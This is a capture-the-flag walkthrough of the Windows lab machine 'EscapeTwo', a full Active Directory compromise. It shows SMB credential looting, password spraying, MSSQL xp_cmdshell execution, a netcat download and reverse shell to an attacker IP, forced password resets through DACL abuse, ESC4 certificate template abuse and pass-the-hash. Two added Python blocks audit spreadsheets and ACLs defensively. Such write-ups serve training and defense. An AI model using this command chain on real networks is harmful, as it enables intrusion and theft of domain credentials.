Escapetwo
OS: Windows
Difficulty: Easy
Points: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.129.231.236 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sV -sC 10.129.231.236
Nmap scan report for 10.129.231.236
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 06:44:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T06:46:23+00:00; -57m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T06:46:22+00:00; -58m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.231.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.231.236:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-13T06:46:23+00:00; -57m59s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-12T22:20:26
|_Not valid after: 2055-01-12T22:20:26
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T06:46:23+00:00; -57m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T06:46:22+00:00; -58m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Enumeration
Nmap shows us a domain, which we add to our hosts file.
echo '10.129.231.236 sequel.htb' >> /etc/hosts
On the HTB platform, if we read the text under MACHINE INFORMATION, credentials are already provided.
rose : KxEPkKe6R8su
SMB
Enumerating the SMB service, we identify the shared folders, among which Accounting Department stands out.
smbmap -u "rose" -p "KxEPkKe6R8su" -H sequel.htb
[+] IP: 10.129.231.236:445 Name: sequel.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
Accounting Department READ ONLY
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
We access the share as follows.
smbclient -U 'rose' '//sequel.htb/Accounting Department'
Inside the share we see two xlsx files, which we download to our machine.
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
6367231 blocks of size 4096. 919756 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (12.6 KiloBytes/sec) (average 12.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (16.8 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \> exit
If we try to open the documents in Excel we get an error, and opening them with LibreOffice shows the following.
Using the unzip command we can extract the contents without needing to open the files.
unzip accounts.xlsx -d accounts
Archive: accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: accounts/xl/workbook.xml
inflating: accounts/xl/theme/theme1.xml
inflating: accounts/xl/styles.xml
inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels
inflating: accounts/xl/worksheets/sheet1.xml
inflating: accounts/xl/sharedStrings.xml
inflating: accounts/_rels/.rels
inflating: accounts/docProps/core.xml
inflating: accounts/docProps/app.xml
inflating: accounts/docProps/custom.xml
inflating: accounts/[Content_Types].xml
Once we extract the contents of accounts.xlsx, we find usernames and passwords in xl/sharedStrings.xml.
cat accounts/xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>
The users we obtain are the following.
angela : 0fwz7Q4mSpurIt99
oscar : 86LxLBMgEWaKUnBG
kevin : Md9Wlq1E5bZnVDVo
sa : MSSQLP@ssw0rd!
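Reading xl/sharedStrings.xml by eye works here because the table is tiny, but that file stores each distinct string only once (its header says count="25" uniqueCount="24", so one cell reuses an earlier string), which misaligns columns as soon as a value repeats. The following is an added example, not code from the writeup, that resolves the sheet's cell references against the shared-string table the way a spreadsheet does; the two XML samples inside it are constructed for the example and contain no real credentials.

```python
"""Recover the cells of an OOXML (.xlsx) workbook directly from its XML parts.

Added example, not part of the original writeup. A .xlsx file is a ZIP
container. Text cells of type "s" hold only an index into
xl/sharedStrings.xml, which lists every distinct string once, in first-use
order, not one entry per cell. Resolving the indexes through
xl/worksheets/sheet1.xml gives the real table even when strings repeat.
The two XML samples below are constructed for this example.
"""
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

M = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": M}
T_TAG = "{%s}t" % M

# Constructed xl/sharedStrings.xml: index 5 is a rich-text string split into
# two <r> runs, and index 6 ("NULL") is referenced by two different cells.
SAMPLE_SHARED_STRINGS = """<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9" uniqueCount="8">
<si><t xml:space="preserve">Username</t></si>
<si><t>Password</t></si>
<si><t>Notes</t></si>
<si><t>alice</t></si>
<si><t>placeholder-pw-1</t></si>
<si><r><t>standard</t></r><r><t xml:space="preserve"> user</t></r></si>
<si><t>NULL</t></si>
<si><t>placeholder-pw-2</t></si>
</sst>"""

# Constructed xl/worksheets/sheet1.xml: shared-string cells (t="s"), a
# numeric cell with no type attribute, and an inline string (t="inlineStr").
SAMPLE_SHEET = """<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData>
<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c><c r="C1" t="s"><v>2</v></c></row>
<row r="2"><c r="A2" t="s"><v>3</v></c><c r="B2" t="s"><v>4</v></c><c r="C2" t="s"><v>5</v></c></row>
<row r="3"><c r="A3" t="s"><v>6</v></c><c r="B3" t="s"><v>7</v></c><c r="C3" t="s"><v>6</v></c></row>
<row r="4"><c r="A4"><v>42</v></c><c r="B4" t="inlineStr"><is><t>inline text</t></is></c></row>
</sheetData>
</worksheet>"""


def shared_strings(xml_text: str) -> List[str]:
    """Every <si> item in document order; rich-text runs are concatenated."""
    root = ET.fromstring(xml_text)
    return ["".join(t.text or "" for t in si.iter(T_TAG))
            for si in root.findall("m:si", NS)]


def cell_text(cell: ET.Element, strings: List[str]) -> str:
    """Resolve one <c> element to its text according to its t attribute."""
    kind = cell.get("t")
    if kind == "s":                      # shared string: <v> holds an index
        return strings[int(cell.find("m:v", NS).text)]
    if kind == "inlineStr":              # text stored inside the cell itself
        return "".join(t.text or "" for t in cell.iter(T_TAG))
    value = cell.find("m:v", NS)         # numbers, booleans, formula results
    return value.text if value is not None else ""


def sheet_rows(sheet_xml: str, strings: List[str]) -> List[List[str]]:
    """Each <row> as a list of cell texts, in sheet order."""
    root = ET.fromstring(sheet_xml)
    return [[cell_text(c, strings) for c in row.findall("m:c", NS)]
            for row in root.iter("{%s}row" % M)]


def records(sheet_xml: str, shared_xml: str) -> List[Dict[str, str]]:
    """First row as header, remaining rows as dicts (short rows stay short)."""
    rows = sheet_rows(sheet_xml, shared_strings(shared_xml))
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]


def records_from_xlsx(path: str) -> List[Dict[str, str]]:
    """Entry point for a real workbook. If the container is damaged so that
    zipfile rejects it (zipfile.BadZipFile), extract it with unzip as done
    above and pass the two XML files to records() directly."""
    with zipfile.ZipFile(path) as z:
        shared = z.read("xl/sharedStrings.xml").decode("utf-8")
        sheet = z.read("xl/worksheets/sheet1.xml").decode("utf-8")
    return records(sheet, shared)


if __name__ == "__main__":
    for rec in records(SAMPLE_SHEET, SAMPLE_SHARED_STRINGS):
        print(rec)
```

Row 3 of the sample is the case that a flat reading of sharedStrings.xml gets wrong: both its first and last cell point at index 6, so the string appears once in the table but twice in the sheet.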
Password Spray
Using the list of users and passwords we perform a password spray; the only valid user for SMB is oscar.
netexec smb sequel.htb -u users.txt -p pass.txt --continue
...
...
SMB 10.129.231.236 445 DC01 [+] sequel.htb\oscar:86LxLBMgEWaKUnBG
...
...
However, doing the same against the MSSQL service, there is a valid user sa which has administrator permissions on the service, as the message Pwn3d! shows.
netexec mssql sequel.htb -u users.txt -p pass.txt --local-auth --continue
...
...
MSSQL 10.129.231.236 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
...
...
MSSQL Command Execution
We connect to MSSQL with the credentials using impacket.
impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
Since we have administrator permissions, we can enable xp_cmdshell to obtain command execution.
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
SQL (sa dbo@master)> EXEC sp_configure 'show advanced options',1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE;
SQL (sa dbo@master)> EXEC sp_configure 'xp_cmdshell',1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> RECONFIGURE;
Now we can execute commands.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULL
Reverse Shell
To obtain a reverse shell we do the following. We create a folder at the root of the drive.
xp_cmdshell "mkdir c:\temp"
SQL (sa dbo@master)> xp_cmdshell "mkdir c:\temp"
output
------
NULL
We will use the nc64.exe binary. We start a web server from the directory where we downloaded the binary.
python3 -m http.server 80
Then we download it onto the target machine.
xp_cmdshell "curl http://10.10.14.33/nc64.exe -o c:\temp\nc.exe"
SQL (sa dbo@master)> xp_cmdshell "curl http://10.10.14.33/nc64.exe -o c:\temp\nc.exe"
output
--------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 45272 100 45272 0 0 99k 0 --:--:-- --:--:-- --:--:-- 101k
NULL
Finally we start our netcat listener.
nc -lvnp 1234
We run the following command to obtain the reverse shell.
xp_cmdshell "c:\temp\nc.exe 10.10.14.33 1234 -e cmd.exe"
Lateral Movement
Enumerating the database files, we find a password in the following file.
type c:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
Performing a password spray, we identify that it can be used with the user ryan.
netexec smb sequel.htb -u users.txt -p WqSZAF6CysDQbGb3
SMB 10.129.231.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
We connect over WinRM.
evil-winrm -i sequel.htb -u ryan -p WqSZAF6CysDQbGb3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Documents> dir ..\desktop
Directory: C:\Users\ryan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/12/2025 2:20 PM 34 user.txt
Privilege Escalation
Using BloodHound we can enumerate the AD objects.
Note
To install BloodHound, use the following commands.
Install BloodHound with apt:
apt install bloodhound
Start the database:
neo4j console
Browse to http://localhost:7474/; the username and password are neo4j : neo4j
Once that is done, run the following command in another terminal:
bloodhound
python3 /opt/BloodHound.py/bloodhound.py -u ryan -p 'WqSZAF6CysDQbGb3' -c all -d sequel.htb -ns 10.129.231.236 --dns-tcp
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.sequel.htb:88)] [Errno -5] No address associated with hostname
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 22S
WriteOwner User
We see that the user ryan has WriteOwner permissions on the user ca_svc.
Therefore ryan can change the owner of the ca_svc user. Object owners retain the ability to modify the object's security descriptor, regardless of the permissions in the object's DACL.
Force Change Password
To take advantage of this privilege we do the following. First we make ourselves the owner of the object.
bloodyAD --host 10.129.231.236 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc
Now we modify the object's privileges so that the user ryan has full control.
bloodyAD --host 10.129.231.236 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 add genericAll 'ca_svc' 'ryan'
[+] ryan has now GenericAll on ca_svc
Finally we force a password change for the ca_svc user.
bloodyAD --host 10.129.231.236 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set password 'ca_svc' 'D00m123!'
[+] Password changed successfully!
We verify that the password change worked.
netexec smb sequel.htb -u ca_svc -p 'D00m123!'
SMB 10.129.231.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.236 445 DC01 [+] sequel.htb\ca_svc:D00m123!
Certificate Services (AD-CS)
Since this user belongs to the Cert Publishers group and, according to its description, can publish certificates, we proceed to enumerate the certificate templates on the server using Certipy.
certipy find -u 'ca_svc@sequel.htb' -p 'D00m123!' -dc-ip '10.129.231.236' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
ESC4
We see that it returns information about a template, DunderMifflinAuthentication, that is vulnerable to the ESC4 technique. ESC4 is possible when templates are misconfigured at the access-control level: if the access control entries (ACEs) allow unintended or unprivileged users to edit the template's security settings, those users can be granted one of the following template security permissions:
- Owner
- WriteOwnerPrincipals
- WriteDaclPrincipals
- WritePropertyPrincipals
As we can see, the user has these permissions.
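The WriteOwner edge on ca_svc and the ESC4 finding on the template are the same class of misconfiguration: a principal outside the intended administrative set holds a right over an object that lets it rewrite that object's security descriptor. The following is an added example, not code from the writeup, BloodHound or Certipy, that audits a constructed model of the permissions printed above for exactly that condition; the object descriptions, the privileged set and the principal names in it are simplified assumptions made for the example.

```python
"""Audit which principals can rewrite an AD object's security descriptor.

Added example, not from the writeup, BloodHound or Certipy. On a user object
such a right ends in a password reset (the WriteOwner chain above); on an
enabled certificate template it is ESC4. The objects below are a constructed,
simplified model of the permissions shown on this page, not live data.
"""
from typing import Dict, List, Tuple

# Rights that let the holder edit the object's ACL or owner, directly or in
# one step (an owner may always rewrite the DACL, whatever the DACL says).
CONTROL_RIGHTS = {"Owner", "FullControl", "WriteOwner", "WriteDacl", "WriteProperty"}

# Principals expected to control these objects. Matching is by name here; a
# real audit resolves SIDs and nested group membership first (assumption).
PRIVILEGED = {
    "SEQUEL.HTB\\Administrators",
    "SEQUEL.HTB\\Administrator",
    "SEQUEL.HTB\\Domain Admins",
    "SEQUEL.HTB\\Enterprise Admins",
}

TEMPLATE_WRITERS = ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins",
                    "SEQUEL.HTB\\Administrator", "SEQUEL.HTB\\Cert Publishers"]

SAMPLE_OBJECTS: List[Dict] = [
    {   # modelled on the Certipy template output above
        "name": "DunderMifflinAuthentication", "kind": "template", "enabled": True,
        "rights": {
            "Owner": ["SEQUEL.HTB\\Enterprise Admins"],
            "FullControl": ["SEQUEL.HTB\\Cert Publishers"],
            "WriteOwner": TEMPLATE_WRITERS,
            "WriteDacl": TEMPLATE_WRITERS,
            "WriteProperty": TEMPLATE_WRITERS,
            "Enroll": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"],
        },
    },
    {   # modelled on the BloodHound edge above; the old owner SID ends in
        # RID 512, which is Domain Admins
        "name": "ca_svc", "kind": "user", "enabled": True,
        "rights": {"Owner": ["SEQUEL.HTB\\Domain Admins"],
                   "WriteOwner": ["SEQUEL.HTB\\ryan"]},
    },
    {   # constructed clean template: anyone can enroll, only admins can edit
        "name": "User", "kind": "template", "enabled": True,
        "rights": {"Owner": ["SEQUEL.HTB\\Enterprise Admins"],
                   "WriteDacl": ["SEQUEL.HTB\\Domain Admins"],
                   "Enroll": ["SEQUEL.HTB\\Domain Users"]},
    },
]

Finding = Tuple[str, str]  # (right, principal)


def control_findings(obj: Dict, privileged=PRIVILEGED) -> List[Finding]:
    """(right, principal) pairs where a non-privileged principal holds a
    control right over the object. Enroll and other non-control rights are
    ignored: they do not let the holder change the object's definition."""
    return sorted(
        (right, principal)
        for right, principals in obj["rights"].items()
        if right in CONTROL_RIGHTS
        for principal in principals
        if principal not in privileged
    )


def audit(objects: List[Dict], privileged=PRIVILEGED) -> Dict[str, List[Finding]]:
    """Objects with at least one finding, keyed by object name."""
    report = {}
    for obj in objects:
        findings = control_findings(obj, privileged)
        if findings:
            report[obj["name"]] = findings
    return report


def esc4_templates(objects: List[Dict], privileged=PRIVILEGED) -> List[str]:
    """Enabled certificate templates whose definition can be rewritten by a
    non-privileged principal: the ESC4 condition. A template that is not
    published on a CA is still reported by audit() but not listed here."""
    return [o["name"] for o in objects
            if o["kind"] == "template" and o["enabled"]
            and control_findings(o, privileged)]


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_OBJECTS).items():
        for right, principal in findings:
            print(f"{name}: {principal} holds {right}")
    print("ESC4 candidates:", esc4_templates(SAMPLE_OBJECTS))
```

Run against the sample, the report names Cert Publishers four times on the template and ryan once on ca_svc, while the clean User template produces nothing: enrollment rights for Domain Users are expected and are not a control right.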
To exploit the vulnerability we follow the blog posts listed in the references.
First we modify the template.
certipy template -u ca_svc -p 'D00m123!' -template DunderMifflinAuthentication -target DC01.sequel.htb -dc-ip 10.129.231.236 -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
We request a certificate for the administrator using our modified template.
Note
Sometimes you have to run the command twice for it to succeed.
certipy req -ca sequel-DC01-CA -u ca_svc -p 'D00m123!' -template DunderMifflinAuthentication -target DC01.sequel.htb -upn administrator@sequel.htb -dc-ip 10.129.231.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Finally, with the certificate we can request a TGT or retrieve the NT hash of the administrator user.
certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
WinRM Access
We connect over WinRM.
evil-winrm -i sequel.htb -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
References
https://github.com/fortra/impacket
https://github.com/int0x33/nc.exe/
https://github.com/SpecterOps/BloodHound
https://www.thehacker.recipes/ad/movement/dacl/grant-ownership
https://www.thehacker.recipes/ad/movement/dacl/grant-rights
https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
https://github.com/ly4k/Certipy
https://www.nccgroup.com/au/research-blog/defending-your-directory-an-expert-guide-to-fortifying-active-directory-certificate-services-adcs-against-exploitation/
https://redfoxsec.com/blog/exploiting-weak-acls-on-active-directory-certificate-templates-esc4/
https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc4/